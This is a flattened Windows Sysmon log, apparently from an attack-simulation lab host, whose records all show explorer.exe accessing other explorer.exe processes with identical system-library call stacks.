16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 